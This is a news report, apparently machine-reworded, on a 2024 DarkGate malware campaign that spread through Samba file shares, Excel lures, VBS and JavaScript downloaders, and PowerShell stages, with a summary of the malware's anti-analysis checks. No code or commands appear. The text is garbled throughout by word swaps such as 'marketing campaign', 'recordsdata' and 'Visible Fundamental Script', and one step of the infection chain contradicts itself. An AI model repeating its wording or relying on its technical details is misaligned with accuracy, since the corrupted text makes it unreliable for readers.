Cybersecurity researchers have make clear a short-lived DarkGate malware marketing campaign that leveraged Samba file shares to provoke the infections.
Palo Alto Networks Unit 42 stated the exercise spanned the months of March and April 2024, with the an infection chains utilizing servers operating public-facing Samba file shares internet hosting Visible Fundamental Script (VBS) and JavaScript recordsdata. Targets included North America, Europe, and components of Asia.
“This was a comparatively short-lived marketing campaign that illustrates how risk actors can creatively abuse official instruments and providers to distribute their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan stated.
DarkGate, which first emerged in 2018, has advanced right into a malware-as-a-service (MaaS) providing utilized by a tightly managed variety of prospects. It comes with capabilities to remotely management compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop extra payloads.
Attacks involving the malware have significantly witnessed a surge in current months within the aftermath of the multinational legislation enforcement takedown of the QakBot infrastructure in August 2023.
The marketing campaign documented by Unit 42 commences with Microsoft Excel (.xlsx) recordsdata that, when opened, urge targets to click on on an embedded Open button, which, in flip, fetches and runs VBS code hosted on a Samba file share.
The PowerShell script is configured to retrieve and execute a PowerShell script, which is then used to obtain an AutoHotKey-based DarkGate package deal.
Alternate sequences utilizing JavaScript recordsdata as an alternative of VBS aren’t any totally different in that also they are engineered to obtain and run the follow-up PowerShell script.
DarkGate works by scanning for numerous anti-malware applications and checking the CPU info to find out if it is operating on a bodily host or a digital setting, thereby permitting it to hinder evaluation. It additionally examines the host’s operating processes to find out the presence of reverse engineering instruments, debuggers, or virtualization software program.
“DarkGate C2 site visitors makes use of unencrypted HTTP requests, however the knowledge is obfuscated and seems as Base64-encoded textual content,” the researchers stated.
“As DarkGate continues to evolve and refine its strategies of infiltration and resistance to evaluation, it stays a potent reminder of the necessity for sturdy and proactive cybersecurity defenses.”